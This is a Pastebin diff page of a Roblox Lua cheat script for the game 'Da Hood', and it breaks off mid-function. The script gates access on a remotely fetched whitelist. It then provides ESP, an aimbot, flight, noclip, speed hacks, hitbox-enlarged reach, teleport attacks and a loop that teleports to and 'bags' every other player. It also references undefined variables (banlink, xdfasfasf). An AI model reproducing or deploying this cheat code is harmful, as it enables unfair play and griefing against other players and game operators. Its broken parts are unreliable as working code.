SHOW:
|
|
- or go back to the newest paste.
| 1 | print'printed shit' | |
| 2 | local Whitelist = false | |
| 3 | for u,v in pairs(game.Workspace:GetDescendants())do if v:IsA("Seat")then v:Destroy()end end
| |
| 4 | local userlink = "https://phantomxx.000webhostapp.com/spywhitelists" -- Link To Usernames | |
| 5 | - | local userlink = "https://pastebin.com/raw/SzfUS7kU" -- Link To Usernames |
| 5 | + | |
| 6 | local usernames = game:HttpGet(userlink, true) | |
| 7 | local banlist = game:HttpGet(banlink, true) | |
| 8 | local current = game.Players.LocalPlayer.Name | |
| 9 | local currentid = game.Players.LocalPlayer.UserId | |
| 10 | local onlyfansxd = false | |
| 11 | local bag = false | |
| 12 | local banned = false | |
| 13 | local takingbag = false | |
| 14 | local onlyfans = "https://phantomxx.000webhostapp.com/spypremium" | |
| 15 | - | local onlyfans = "https://pastebin.com/raw/6zbiucSW" |
| 15 | + | |
| 16 | ||
| 17 | ||
| 18 | if string.find(usernames,current) and string.find(usernames,currentid) then -- Looks For If Username Matches Database | |
| 19 | ||
| 20 | ||
| 21 | ||
| 22 | HasDied = true | |
| 23 | demspeed = 50 | |
| 24 | local punchreachz = false | |
| 25 | local stuff = {"[Bat]", "[Knife]" ,"[StopSign]"}
| |
| 26 | Player = game:GetService("Players").LocalPlayer
| |
| 27 | local spyfunction = true | |
| 28 | local bspeed = 250 | |
| 29 | ||
| 30 | Whitelist = true | |
| 31 | local plrs = game:GetService("Players")
| |
| 32 | local TeamBased = false ; local teambasedswitch = "o" | |
| 33 | local presskeytoaim = true; local aimkey = "e" | |
| 34 | local raycast = false | |
| 35 | local espupdatetime = 5; autoesp = false | |
| 36 | local lockaim = true; local lockangle = 5 | |
| 37 | local PLAYERSERVERS = Instance.new("Folder", workspace)
| |
| 38 | PLAYERSERVERS.Name = "WhitelistedAmmo" | |
| 39 | local plrsforaim = {}
| |
| 40 | local bruh = false | |
| 41 | local lplr = game:GetService("Players").LocalPlayer
| |
| 42 | local godblock = false | |
| 43 | ||
| 44 | f = {}
| |
| 45 | local espforlder | |
| 46 | ||
| 47 | f.addesp = function() | |
| 48 | --print("ESP ran")
| |
| 49 | if espforlder then | |
| 50 | else | |
| 51 | espforlder = Instance.new("Folder")
| |
| 52 | espforlder.Parent = game.Workspace.CurrentCamera | |
| 53 | end | |
| 54 | for i, v in pairs(espforlder:GetChildren()) do | |
| 55 | v:Destroy() | |
| 56 | end | |
| 57 | for _, plr in pairs(plrs:GetChildren()) do | |
| 58 | if plr.Character and plr.Character.Humanoid.Health > 0 and plr.Name ~= lplr.Name then | |
| 59 | if TeamBased == true then | |
| 60 | if plr.Team.Name ~= plrs.LocalPlayer.Team.Name then | |
| 61 | local e = espforlder:FindFirstChild(plr.Name) | |
| 62 | if not e then | |
| 63 | --print("Added esp for team based")
| |
| 64 | local bill = Instance.new("BillboardGui", espforlder)
| |
| 65 | bill.Name = plr.Name | |
| 66 | bill.AlwaysOnTop = true | |
| 67 | bill.Size = UDim2.new(1,0,1,0) | |
| 68 | bill.Adornee = plr.Character.Head | |
| 69 | local Frame = Instance.new('Frame',bill)
| |
| 70 | Frame.Active = true | |
| 71 | Frame.BackgroundColor3 = Color3.new(0/255,255/255,0/255) | |
| 72 | Frame.BackgroundTransparency = 0 | |
| 73 | Frame.BorderSizePixel = 0 | |
| 74 | Frame.AnchorPoint = Vector2.new(.5, .5) | |
| 75 | Frame.Position = UDim2.new (0.5,0,0.5,0) | |
| 76 | Frame.Size = UDim2.new (1,0,1,0) | |
| 77 | Frame.Rotation = 0 | |
| 78 | plr.Character.Humanoid.Died:Connect(function() | |
| 79 | bill:Destroy() | |
| 80 | end) | |
| 81 | end | |
| 82 | end | |
| 83 | else | |
| 84 | local e = espforlder:FindFirstChild(plr.Name) | |
| 85 | if not e then | |
| 86 | --print("Added esp")
| |
| 87 | local bill = Instance.new("BillboardGui", espforlder)
| |
| 88 | bill.Name = plr.Name | |
| 89 | bill.AlwaysOnTop = true | |
| 90 | bill.Size = UDim2.new(1,0,1,0) | |
| 91 | bill.Adornee = plr.Character.Head | |
| 92 | local Frame = Instance.new('Frame',bill)
| |
| 93 | Frame.Active = true | |
| 94 | Frame.BackgroundColor3 = Color3.new(0/255,255/255,0/255) | |
| 95 | Frame.BackgroundTransparency = 0 | |
| 96 | Frame.BorderSizePixel = 0 | |
| 97 | Frame.AnchorPoint = Vector2.new(.5, .5) | |
| 98 | Frame.Position = UDim2.new (0.5,0,0.5,0) | |
| 99 | Frame.Size = UDim2.new (1,0,1,0) | |
| 100 | Frame.Rotation = 0 | |
| 101 | plr.Character.Humanoid.Died:Connect(function() | |
| 102 | bill:Destroy() | |
| 103 | end) | |
| 104 | end | |
| 105 | end | |
| 106 | ||
| 107 | ||
| 108 | end | |
| 109 | end | |
| 110 | end | |
| 111 | local cam = game.Workspace.CurrentCamera | |
| 112 | ||
| 113 | local mouse = lplr:GetMouse() | |
| 114 | local switch = false | |
| 115 | ||
| 116 | local aimatpart = nil | |
| 117 | ||
| 118 | ||
| 119 | function getfovxyz (p0, p1, deg) | |
| 120 | local x1, y1, z1 = p0:ToOrientation() | |
| 121 | local cf = CFrame.new(p0.p, p1.p) | |
| 122 | local x2, y2, z2 = cf:ToOrientation() | |
| 123 | --local d = math.deg | |
| 124 | if deg then | |
| 125 | --return Vector3.new(d(x1-x2), d(y1-y2), d(z1-z2)) | |
| 126 | else | |
| 127 | return Vector3.new((x1-x2), (y1-y2), (z1-z2)) | |
| 128 | end | |
| 129 | end | |
| 130 | ||
| 131 | function getaimbotplrs() | |
| 132 | plrsforaim = {}
| |
| 133 | for i, plr in pairs(plrs:GetChildren()) do | |
| 134 | if plr.Character and plr.Character.Humanoid and plr.Character.Humanoid.Health > 0 and plr.Name ~= lplr.Name and plr.Character.Head then | |
| 135 | ||
| 136 | if TeamBased == true then | |
| 137 | if plr.Team.Name ~= lplr.Team.Name then | |
| 138 | local cf = CFrame.new(game.Workspace.CurrentCamera.CFrame.p, plr.Character.Head.CFrame.p) | |
| 139 | local r = Ray.new(cf, cf.LookVector * 10000) | |
| 140 | local ign = {}
| |
| 141 | for i, v in pairs(plrs.LocalPlayer.Character:GetChildren()) do | |
| 142 | if v:IsA("BasePart") then
| |
| 143 | table.insert(ign , v) | |
| 144 | end | |
| 145 | end | |
| 146 | local obj = game.Workspace:FindPartOnRayWithIgnoreList(r, ign) | |
| 147 | if obj.Parent == plr.Character and obj.Parent ~= lplr.Character then | |
| 148 | table.insert(plrsforaim, obj) | |
| 149 | end | |
| 150 | end | |
| 151 | else | |
| 152 | local cf = CFrame.new(game.Workspace.CurrentCamera.CFrame.p, plr.Character.Head.CFrame.p) | |
| 153 | local r = Ray.new(cf, cf.LookVector * 10000) | |
| 154 | local ign = {}
| |
| 155 | for i, v in pairs(plrs.LocalPlayer.Character:GetChildren()) do | |
| 156 | if v:IsA("BasePart") then
| |
| 157 | table.insert(ign , v) | |
| 158 | end | |
| 159 | end | |
| 160 | local obj = game.Workspace:FindPartOnRayWithIgnoreList(r, ign) | |
| 161 | if obj.Parent == plr.Character and obj.Parent ~= lplr.Character then | |
| 162 | table.insert(plrsforaim, obj) | |
| 163 | end | |
| 164 | end | |
| 165 | ||
| 166 | ||
| 167 | end | |
| 168 | end | |
| 169 | end | |
| 170 | ||
| 171 | local heazd = false | |
| 172 | ||
| 173 | function aimat(part) | |
| 174 | cam.CFrame = CFrame.new(cam.CFrame.p, part.CFrame.p) | |
| 175 | end | |
| 176 | function checkfov (part) | |
| 177 | local fov = getfovxyz(game.Workspace.CurrentCamera.CFrame, part.CFrame) | |
| 178 | local angle = math.abs(fov.X) + math.abs(fov.Y) | |
| 179 | return angle | |
| 180 | end | |
| 181 | ||
| 182 | ||
| 183 | ||
| 184 | ||
| 185 | -- if switch == true then | |
| 186 | -- local maxangle = 99999 | |
| 187 | -- | |
| 188 | -- --print("Loop")
| |
| 189 | -- if true and raycast == false then | |
| 190 | -- for i, plr in pairs(plrs:GetChildren()) do | |
| 191 | -- if plr.Name ~= lplr.Name and plr.Character and plr.Character.Head and plr.Character.Humanoid and plr.Character.Humanoid.Health > 1 then | |
| 192 | -- if TeamBased then | |
| 193 | -- if plr.Team.Name ~= lplr.Team.Name or plr.Team.TeamColor ~= lplr.Team.TeamColor then | |
| 194 | -- local an = checkfov(plr.Character.Head) | |
| 195 | -- if an < maxangle then | |
| 196 | -- maxangle = an | |
| 197 | -- aimatpart = plr.Character.Head | |
| 198 | -- if an < lockangle then | |
| 199 | -- break | |
| 200 | -- end | |
| 201 | -- end | |
| 202 | -- end | |
| 203 | -- else | |
| 204 | -- local an = checkfov(plr.Character.Head) | |
| 205 | -- if an < maxangle then | |
| 206 | -- maxangle = an | |
| 207 | -- aimatpart = plr.Character.Head | |
| 208 | -- if an < lockangle then | |
| 209 | -- break | |
| 210 | -- end | |
| 211 | -- end | |
| 212 | -- end | |
| 213 | -- | |
| 214 | -- | |
| 215 | -- | |
| 216 | -- | |
| 217 | -- end | |
| 218 | -- end | |
| 219 | -- elseif raycast == true then | |
| 220 | -- | |
| 221 | -- end | |
| 222 | ||
| 223 | ||
| 224 | ||
| 225 | ||
| 226 | ||
| 227 | ||
| 228 | cashdrop = false | |
| 229 | clip = false | |
| 230 | local nuking = false | |
| 231 | shittymelee = "[Knife]" | |
| 232 | local SaveYourself = true | |
| 233 | local punchreachrr = "idk" | |
| 234 | local nukerowner = "" | |
| 235 | lagspike = false | |
| 236 | local crashserver = false | |
| 237 | local flying = false | |
| 238 | ||
| 239 | local autostomp = false | |
| 240 | local loopbring = false | |
| 241 | niceknife = false | |
| 242 | local fog = 500 | |
| 243 | local valtomove = 4 | |
| 244 | function tp(x,y,z) | |
| 245 | game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(Vector3.new(x,y,z)) | |
| 246 | end | |
| 247 | ||
| 248 | ||
| 249 | guntype = "idk" | |
| 250 | maus = game.Players.LocalPlayer:GetMouse() | |
| 251 | reload = false | |
| 252 | sped = false | |
| 253 | DoThing = false | |
| 254 | respawn = false | |
| 255 | maus.KeyDown:Connect(function(key) | |
| 256 | if key == "b" then | |
| 257 | if not aimatpart then | |
| 258 | local maxangle = math.rad(20) | |
| 259 | for i, plr in pairs(plrs:GetChildren()) do | |
| 260 | if plr.Name ~= lplr.Name and plr.Character and plr.Character.Head and plr.Character.Humanoid and plr.Character.Humanoid.Health > 1 then | |
| 261 | if TeamBased == true then | |
| 262 | if plr.Team.Name ~= lplr.Team.Name then | |
| 263 | local an = checkfov(plr.Character.Head) | |
| 264 | if an < maxangle then | |
| 265 | maxangle = an | |
| 266 | aimatpart = plr.Character.Head | |
| 267 | end | |
| 268 | end | |
| 269 | else | |
| 270 | local an = checkfov(plr.Character.Head) | |
| 271 | if an < maxangle then | |
| 272 | maxangle = an | |
| 273 | nukerowner = plr.Character.Name | |
| 274 | aimatpart = plr.Character.Head | |
| 275 | end | |
| 276 | --print(plr) | |
| 277 | end | |
| 278 | local old = aimatpart | |
| 279 | ||
| 280 | ||
| 281 | end | |
| 282 | end | |
| 283 | else | |
| 284 | aimatpart = nil | |
| 285 | canaimat = false | |
| 286 | delay(1.1, function() | |
| 287 | canaimat = true | |
| 288 | end) | |
| 289 | end | |
| 290 | ||
| 291 | ||
| 292 | elseif key == "z" then | |
| 293 | ||
| 294 | if game.Players.LocalPlayer.Backpack:FindFirstChild("Combat") then
| |
| 295 | game.Players.LocalPlayer.Backpack:FindFirstChild("Combat").Parent = game.Players.LocalPlayer.Character
| |
| 296 | end | |
| 297 | wait() | |
| 298 | game.Players.LocalPlayer.Character:FindFirstChild("Combat"):Activate()
| |
| 299 | if game.Players.LocalPlayer.Character then | |
| 300 | if game.Players.LocalPlayer.character:FindFirstChild("HumanoidRootPart") then
| |
| 301 | returnpos = game.Players.LocalPlayer.character:FindFirstChild("HumanoidRootPart").CFrame
| |
| 302 | end | |
| 303 | end | |
| 304 | wait(1.1) | |
| 305 | ||
| 306 | for i,v in pairs(game.Players:GetChildren()) do | |
| 307 | if v.Name ~= game.Players.LocalPlayer.Name and v.Name ~= "Vortextures" and v.Name ~= "Vortexturize" and v.Name ~= "Vortexturable" then | |
| 308 | if v.Character then | |
| 309 | if v.Character:FindFirstChild("HumanoidRootPart") then
| |
| 310 | distance = game.Players.LocalPlayer:DistanceFromCharacter(v.Character.HumanoidRootPart.Position) | |
| 311 | ||
| 312 | if distance < 35 then | |
| 313 | for i = 1,5 do | |
| 314 | if v then | |
| 315 | if v.Character and game.Players.LocalPlayer.Character then | |
| 316 | if v.Character:FindFirstChild("HumanoidRootPart") and game.Players.LocalPlayer.Character:FindFirstChild("HumanoidRootPart") and v.Character.Humanoid.Health > 10 then
| |
| 317 | game.Players.LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame = v.Character:FindFirstChild("HumanoidRootPart").CFrame * CFrame.new(0,0,0.7)
| |
| 318 | end | |
| 319 | end | |
| 320 | end | |
| 321 | game.Workspace.CurrentCamera.CFrame = CFrame.new(game.Workspace.CurrentCamera.CFrame.p, v.Character.HumanoidRootPart.CFrame.p) | |
| 322 | wait(0.05) | |
| 323 | end | |
| 324 | ||
| 325 | end | |
| 326 | ||
| 327 | end | |
| 328 | end | |
| 329 | end | |
| 330 | end | |
| 331 | ||
| 332 | ||
| 333 | ||
| 334 | elseif key == "v" then | |
| 335 | if punchreachz == false then | |
| 336 | game.Players.LocalPlayer.Character.RightHand.Size = Vector3.new(20, 20, 20) | |
| 337 | game.Players.LocalPlayer.Character.LeftHand.Size = Vector3.new(20, 20, 20) | |
| 338 | game.Players.LocalPlayer.Character.RightHand.Massless = true | |
| 339 | game.Players.LocalPlayer.Character.LeftHand.Massless = true | |
| 340 | punchreachz = true | |
| 341 | elseif punchreachz == true then | |
| 342 | punchreachz = false | |
| 343 | game.Players.LocalPlayer.Character.RightHand.Size = Vector3.new(1, 1, 1) | |
| 344 | game.Players.LocalPlayer.Character.LeftHand.Size = Vector3.new(1, 1, 1) | |
| 345 | game.Players.LocalPlayer.Character.RightHand.Massless = true | |
| 346 | game.Players.LocalPlayer.Character.LeftHand.Massless = true | |
| 347 | end | |
| 348 | elseif key == "c" then | |
| 349 | if flying == false then | |
| 350 | flying = true | |
| 351 | ||
| 352 | ||
| 353 | local plr = game.Players.LocalPlayer | |
| 354 | local mouse = plr:GetMouse() | |
| 355 | ||
| 356 | localplayer = plr | |
| 357 | ||
| 358 | if workspace:FindFirstChild("Core") then
| |
| 359 | workspace.Core:Destroy() | |
| 360 | end | |
| 361 | ||
| 362 | local Core = Instance.new("Part")
| |
| 363 | Core.Name = "Core" | |
| 364 | Core.Size = Vector3.new(0.05, 0.05, 0.05) | |
| 365 | local hum = game.Players.LocalPlayer.Character:FindFirstChildOfClass("Humanoid")
| |
| 366 | spawn(function() | |
| 367 | Core.Parent = workspace | |
| 368 | local Weld = Instance.new("Weld", Core)
| |
| 369 | Weld.Part0 = Core | |
| 370 | Weld.Part1 = localplayer.Character.LowerTorso | |
| 371 | Weld.C0 = CFrame.new(0, 0, 0) | |
| 372 | end) | |
| 373 | ||
| 374 | workspace:WaitForChild("Core")
| |
| 375 | ||
| 376 | local torso = workspace.Core | |
| 377 | ||
| 378 | local speed=20 | |
| 379 | local keys={a=false,d=false,w=false,s=false}
| |
| 380 | local e1 | |
| 381 | local e2 | |
| 382 | local function start() | |
| 383 | local pos = Instance.new("BodyPosition",torso)
| |
| 384 | local gyro = Instance.new("BodyGyro",torso)
| |
| 385 | pos.Name="EPIXPOS" | |
| 386 | pos.maxForce = Vector3.new(math.huge, math.huge, math.huge) | |
| 387 | pos.position = torso.Position | |
| 388 | gyro.maxTorque = Vector3.new(9e9, 9e9, 9e9) | |
| 389 | gyro.cframe = torso.CFrame | |
| 390 | repeat | |
| 391 | wait() | |
| 392 | hum.PlatformStand=true | |
| 393 | local new=gyro.cframe - gyro.cframe.p + pos.position | |
| 394 | if not keys.w and not keys.s and not keys.a and not keys.d then | |
| 395 | speed=10 | |
| 396 | end | |
| 397 | if keys.w then | |
| 398 | new = new + workspace.CurrentCamera.CoordinateFrame.lookVector * speed | |
| 399 | speed=speed+0 | |
| 400 | end | |
| 401 | if keys.s then | |
| 402 | new = new - workspace.CurrentCamera.CoordinateFrame.lookVector * speed | |
| 403 | speed=speed+0 | |
| 404 | end | |
| 405 | if keys.d then | |
| 406 | new = new * CFrame.new(speed,0,0) | |
| 407 | speed=speed+0 | |
| 408 | end | |
| 409 | if keys.a then | |
| 410 | new = new * CFrame.new(-speed,0,0) | |
| 411 | speed=speed+0 | |
| 412 | end | |
| 413 | if speed>20 then | |
| 414 | speed=10 | |
| 415 | end | |
| 416 | pos.position=new.p | |
| 417 | if keys.w then | |
| 418 | gyro.cframe = workspace.CurrentCamera.CoordinateFrame*CFrame.Angles(-math.rad(speed*0),0,0) | |
| 419 | elseif keys.s then | |
| 420 | gyro.cframe = workspace.CurrentCamera.CoordinateFrame*CFrame.Angles(math.rad(speed*0),0,0) | |
| 421 | else | |
| 422 | gyro.cframe = workspace.CurrentCamera.CoordinateFrame | |
| 423 | end | |
| 424 | until flying == false | |
| 425 | if gyro then gyro:Destroy() end | |
| 426 | if pos then pos:Destroy() end | |
| 427 | flying=false | |
| 428 | hum.PlatformStand=false | |
| 429 | speed=20 | |
| 430 | end | |
| 431 | e1=mouse.KeyDown:connect(function(key) | |
| 432 | if not torso or not torso.Parent then flying=false e1:disconnect() e2:disconnect() return end | |
| 433 | if key=="w" then | |
| 434 | keys.w=true | |
| 435 | elseif key=="s" then | |
| 436 | keys.s=true | |
| 437 | elseif key=="a" then | |
| 438 | keys.a=true | |
| 439 | elseif key=="d" then | |
| 440 | keys.d=true | |
| 441 | ||
| 442 | end | |
| 443 | end) | |
| 444 | e2=mouse.KeyUp:connect(function(key) | |
| 445 | if key=="w" then | |
| 446 | keys.w=false | |
| 447 | elseif key=="s" then | |
| 448 | keys.s=false | |
| 449 | elseif key=="a" then | |
| 450 | keys.a=false | |
| 451 | elseif key=="d" then | |
| 452 | keys.d=false | |
| 453 | end | |
| 454 | end) | |
| 455 | ||
| 456 | start() | |
| 457 | ||
| 458 | else | |
| 459 | if workspace:FindFirstChild("Core") then
| |
| 460 | workspace.Core:Destroy() | |
| 461 | end | |
| 462 | flying = false | |
| 463 | ||
| 464 | end | |
| 465 | ||
| 466 | elseif key == "p" then | |
| 467 | game.Players.LocalPlayer.Character:Destroy() | |
| 468 | elseif key == "l" and sped == false then | |
| 469 | sped = true | |
| 470 | game.Players.LocalPlayer.Character.Humanoid.Name = "Humz" | |
| 471 | game.Players.LocalPlayer.Character.Humz.WalkSpeed = 100 | |
| 472 | game.Players.LocalPlayer.Character.Humz.JumpPower = 200 | |
| 473 | demspeed = 200 | |
| 474 | elseif key == "l" and sped == true then | |
| 475 | sped = false | |
| 476 | game.Players.LocalPlayer.Character.Humz.WalkSpeed = 16 | |
| 477 | game.Players.LocalPlayer.Character.Humz.JumpPower = 50 | |
| 478 | demspeed = 50 | |
| 479 | game.Players.LocalPlayer.Character.Humz.Name = "Humanoid" | |
| 480 | elseif key == "k" and clip == false then | |
| 481 | clip = true | |
| 482 | local RunService = game:GetService('RunService')
| |
| 483 | ||
| 484 | ||
| 485 | RunService.Heartbeat:Connect(function(step) | |
| 486 | if clip == true then | |
| 487 | game.Players.LocalPlayer.Character.Humanoid:ChangeState(11) | |
| 488 | end | |
| 489 | end) | |
| 490 | elseif key == "k" and clip == true then | |
| 491 | clip = false | |
| 492 | ||
| 493 | elseif key == "j" and niceknife == false then | |
| 494 | niceknife = true | |
| 495 | for i, v in ipairs(stuff) do | |
| 496 | if game:GetService("Players").LocalPlayer.Character:FindFirstChildOfClass("Tool") then
| |
| 497 | local tool = game:GetService("Players").LocalPlayer.Character:FindFirstChildOfClass("Tool")
| |
| 498 | if tool.Name == v then | |
| 499 | shittymelee = tool.name | |
| 500 | game:GetService("Players").LocalPlayer.Character[shittymelee].Handle.Size = Vector3.new(30, 30, 30)
| |
| 501 | end | |
| 502 | end | |
| 503 | end | |
| 504 | elseif key == "j" and niceknife == true then | |
| 505 | niceknife = false | |
| 506 | for i, v in ipairs(stuff) do | |
| 507 | if game:GetService("Players").LocalPlayer.Character:FindFirstChildOfClass("Tool") then
| |
| 508 | local tool = game:GetService("Players").LocalPlayer.Character:FindFirstChildOfClass("Tool")
| |
| 509 | if tool.Name == v then | |
| 510 | shittymelee = tool.name | |
| 511 | game:GetService("Players").LocalPlayer.Character[shittymelee].Handle.Size = Vector3.new(1, 1, 1)
| |
| 512 | end | |
| 513 | end | |
| 514 | end | |
| 515 | elseif key == "x" and DoThing == false then | |
| 516 | DoThing = true | |
| 517 | local Part = Instance.new("Part",workspace)
| |
| 518 | Part.Name = "GetFucked" | |
| 519 | Part.Anchored = false | |
| 520 | Part.CanCollide = false | |
| 521 | Part.Transparency = 1 | |
| 522 | local Part1= Instance.new("Part",workspace)
| |
| 523 | Part1.Name = "GetFucked1" | |
| 524 | Part1.Anchored = true | |
| 525 | Part1.CanCollide = false | |
| 526 | Part1.Transparency = 1 | |
| 527 | ||
| 528 | local Weld = Instance.new("Weld", Part1)
| |
| 529 | Weld.Part0 = Part1 | |
| 530 | Weld.Part1 = Part | |
| 531 | Weld.C0 = CFrame.new(0, 0, 10000) | |
| 532 | local cor = coroutine.wrap(function() | |
| 533 | wait(2) | |
| 534 | Part:Destroy() | |
| 535 | Part1:Destroy() | |
| 536 | Weld:Destroy() | |
| 537 | DoThing = false | |
| 538 | end) | |
| 539 | cor() | |
| 540 | pcall(function() | |
| 541 | if game.Players.LocalPlayer.Character.RightHand:FindFirstChildOfClass("Model") then
| |
| 542 | game.Players.LocalPlayer.Character.RightHand.Model.RightWrist:Destroy() | |
| 543 | end | |
| 544 | game.Players.LocalPlayer.Character.RightHand.RightWrist:Destroy() | |
| 545 | end) | |
| 546 | local laugh = 0 | |
| 547 | repeat | |
| 548 | ||
| 549 | laugh = laugh+200 | |
| 550 | Part1.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.Angles(0, laugh, math.pi/-2) | |
| 551 | local lol = game.Players.LocalPlayer.Character.HumanoidRootPart | |
| 552 | game.Players.LocalPlayer.Character.RightHand.CFrame = CFrame.new(Part.CFrame.X ,Part.CFrame.Y+2, Part.CFrame.Z) | |
| 553 | game.Players.LocalPlayer.Character.RightHand.Massless = true | |
| 554 | game.Players.LocalPlayer.Character.RightHand.Size = Vector3.new(0, 0, 0) | |
| 555 | wait() | |
| 556 | until game.Workspace:FindFirstChild("GetFucked") == nil
| |
| 557 | ||
| 558 | local lol = game.Players.LocalPlayer.Character.HumanoidRootPart | |
| 559 | game.Players.LocalPlayer.Character.RightHand.Size = Vector3.new(1, 0.5, 1) | |
| 560 | for i = 1, 10 do | |
| 561 | game.Players.LocalPlayer.Character.RightHand.CFrame = lol.CFrame | |
| 562 | wait(0.05) | |
| 563 | end | |
| 564 | end | |
| 565 | end) | |
| 566 | ||
| 567 | local spin = false | |
| 568 | local chatlogs = false | |
| 569 | ||
| 570 | function Not(text, image, Title) | |
| 571 | local cor = coroutine.wrap(function() | |
| 572 | local sound = Instance.new("Sound", game.CoreGui)
| |
| 573 | sound.SoundId = "rbxassetid://216917652" | |
| 574 | sound:Play() | |
| 575 | wait(4) | |
| 576 | sound:Destroy() | |
| 577 | end) | |
| 578 | cor() | |
| 579 | game.StarterGui:SetCore("SendNotification", {
| |
| 580 | Title = Title; | |
| 581 | Text = text; | |
| 582 | Icon = "rbxassetid://"..image; | |
| 583 | Duration = 2; | |
| 584 | }) | |
| 585 | end | |
| 586 | if string.find(xdfasfasf,current) and string.find(xdfasfasf,currentid) then | |
| 587 | onlyfansxd = true | |
| 588 | Not("Premium User set to true", 145360599, "Premium System")
| |
| 589 | end | |
| 590 | ||
| 591 | gunz = "musk" | |
| 592 | owner = "fat" | |
| 593 | function chat(wordstosay) | |
| 594 | if spyfunction == true then | |
| 595 | game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer(wordstosay, "All") | |
| 596 | end | |
| 597 | end | |
| 598 | local reachthing = "Combat" | |
| 599 | local lefolder = Instance.new("Folder", game.CoreGui)
| |
| 600 | lefolder.Name = "Gottem" | |
| 601 | local lefolder1 = Instance.new("Folder", game.CoreGui)
| |
| 602 | lefolder1.Name = "ReachXd" | |
| 603 | function CreateValue(name, value, parent) | |
| 604 | if parent:FindFirstChild(name) == nil then | |
| 605 | local Values = Instance.new("StringValue", parent)
| |
| 606 | Values.Name = name | |
| 607 | Values.Value = value | |
| 608 | end | |
| 609 | end | |
| 610 | function RemoveValue(name, value, parent) | |
| 611 | if parent:FindFirstChild(name) then | |
| 612 | parent[name]:Destroy() | |
| 613 | end | |
| 614 | end | |
| 615 | local corz = coroutine.wrap(function() | |
| 616 | CreateValue("Glock", "Glock", lefolder)
| |
| 617 | CreateValue("AK47", "AK",lefolder)
| |
| 618 | CreateValue("RPG", "RPG",lefolder)
| |
| 619 | CreateValue("DrumGun", "Drum",lefolder)
| |
| 620 | CreateValue("Flamethrower", "Flame",lefolder)
| |
| 621 | CreateValue("Shotgun", "Shotgun",lefolder)
| |
| 622 | CreateValue("Silencer", "Silencer",lefolder)
| |
| 623 | CreateValue("LMG", "LMGlol",lefolder)
| |
| 624 | CreateValue("Revolver", "Revolver",lefolder)
| |
| 625 | CreateValue("P90", "P90",lefolder)
| |
| 626 | CreateValue("AR", "AR",lefolder)
| |
| 627 | CreateValue("SMG", "SMG",lefolder)
| |
| 628 | CreateValue("StopSign", "ez",lefolder1)
| |
| 629 | CreateValue("Knife", "ez",lefolder1)
| |
| 630 | CreateValue("Combat", "ez",lefolder1)
| |
| 631 | CreateValue("Bat", "ez",lefolder1)
| |
| 632 | ||
| 633 | end) | |
| 634 | corz() | |
| 635 | ||
| 636 | local punchreach = false | |
| 637 | function money(number) | |
| 638 | local i, j, minus, int, fraction = tostring(number):find('([-]?)(%d+)([.]?%d*)')
| |
| 639 | int = int:reverse():gsub("(%d%d%d)", "%1,")
| |
| 640 | return minus .. int:reverse():gsub("^,", "") .. fraction
| |
| 641 | end | |
| 642 | Not("Welcome, "..game.Players.LocalPlayer.Name, 145360599, "Da Hood UI")
| |
| 643 | game.Players.LocalPlayer.Chatted:Connect(function(msg) | |
| 644 | if msg:sub(1, 6) == "/e gun" then | |
| 645 | for i,v in pairs(game.CoreGui.Gottem:GetChildren()) do | |
| 646 | if v.Name:lower():sub(1,#msg:sub(8)) == msg:sub(8):lower() then | |
| 647 | local guni = v | |
| 648 | gunz = "["..guni.Name.."]" | |
| 649 | print(gunz) | |
| 650 | chat("[Spy] Gun switched to "..guni.Name)
| |
| 651 | Not("Gun switched to "..guni.Name, 145360599, "Gun Switch")
| |
| 652 | local gun = guni.Value | |
| 653 | print(gun) | |
| 654 | break | |
| 655 | end | |
| 656 | end | |
| 657 | elseif msg:sub(1, 8) == "/e reach" then | |
| 658 | for i,v in pairs(game.CoreGui.ReachXd:GetChildren()) do | |
| 659 | if v.Name:lower():sub(1,#msg:sub(10)) == msg:sub(10):lower() then | |
| 660 | local guni = v | |
| 661 | reachthing = "["..guni.Name.."]" | |
| 662 | print(gunz) | |
| 663 | Not("Reach switched to "..guni.Name, 145360599, "Reach Switch")
| |
| 664 | local reachthing = guni.Value | |
| 665 | print(reachthing) | |
| 666 | break | |
| 667 | end | |
| 668 | end | |
| 669 | elseif msg == "/e bag all" then | |
| 670 | bag = true | |
| 671 | repeat | |
| 672 | ||
| 673 | local cor = coroutine.wrap(function() | |
| 674 | if not game.Players.LocalPlayer.Character:FindFirstChild("[BrownBag]") then
| |
| 675 | takingbag = true | |
| 676 | local cor = coroutine.wrap(function() | |
| 677 | game.Players.LocalPlayer.Character:MoveTo(Vector3.new(-314.580566, 51.1788902, -727.484558)) | |
| 678 | end) | |
| 679 | cor() | |
| 680 | wait(1) | |
| 681 | fireclickdetector(workspace.Ignored.Shop["[BrownBag] - $25"].ClickDetector, 4) | |
| 682 | wait(0.5) | |
| 683 | game.Players.LocalPlayer.Backpack["[BrownBag]"].Parent = game.Players.LocalPlayer.Character | |
| 684 | takingbag = false | |
| 685 | end | |
| 686 | end) | |
| 687 | cor() | |
| 688 | if takingbag == false then | |
| 689 | for i, v in pairs(game.Players:GetPlayers()) do | |
| 690 | if v.Character:FindFirstChild("Christmas_Sock") == nil and v.Character:FindFirstChildOfClass("ForceField") == nil and v.Character ~= game.Players.LocalPlayer.Character then
| |
| 691 | local chars = v.Character | |
| 692 | if game.Players.LocalPlayer.Character:FindFirstChild("[BrownBag]") then
| |
| 693 | game.Players.LocalPlayer.Character["[BrownBag]"]:Activate() | |
| 694 | end | |
| 695 | game.Players.LocalPlayer.Character:MoveTo(v.Character.UpperTorso.Position) | |
| 696 | end | |
| 697 | wait(0.005) | |
| 698 | end | |
| 699 | end | |
| 700 | wait() | |
| 701 | until bag == false | |
| 702 | elseif msg == "/e fog" then | |
| 703 | if fog == 500 then | |
| 704 | fog = 1000000000000000 | |
| 705 | Not("Fog set to false", 145360599, "Fog System")
| |
| 706 | game.Lighting.FogEnd = 1000000000000000 | |
| 707 | elseif fog == 1000000000000000 then | |
| 708 | Not("Fog set to true", 145360599, "Fog System")
| |
| 709 | game.Lighting.FogEnd = 500 | |
| 710 | fog = 500 | |
| 711 | end | |
| 712 | elseif msg == "/e save" then | |
| 713 | if SaveYourself == false then | |
| 714 | SaveYourself = true | |
| 715 | Not("Auto-Death set to true", 145360599, "Danger Checker")
| |
| 716 | elseif SaveYourself == true then | |
| 717 | SaveYourself = false | |
| 718 | Not("Auto-Death set to false", 145360599, "Danger Checker")
| |
| 719 | end | |
